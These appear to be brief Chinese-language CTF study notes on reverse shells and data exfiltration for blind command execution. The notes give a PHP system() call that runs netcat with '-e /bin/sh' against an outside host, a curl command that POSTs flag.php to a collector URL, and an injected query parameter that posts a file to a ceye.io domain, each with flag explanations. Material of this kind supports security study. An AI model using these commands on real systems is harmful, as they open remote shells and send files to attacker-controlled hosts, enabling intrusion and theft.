反弹shell讲解

system("nc s546459d57.zicp.fun 23494 -e /bin/sh");

rce无回显，反弹shell详解

 DNS外带：

curl -X POST -F xx=@flag.php  http://aaa
从目标网站以POST方式向http://aaa上传一个文件，名字叫xx 文件内容是flag.php

//-X POST  指定 HTTP 请求的方法为 POST
//其中-F 是带文件的形式发送post请求
//xx是上传文件的name值，flag.php就是上传的文件（我们想要的文件的名字）
//aaa是我们在bp中得到的域名地址

?addr=curl -X POST -d @/tmp/Syclover  1q3gva.ceye.io
-d ：post/put/delete 请求所带的form表单或body ;get请求无视这个参数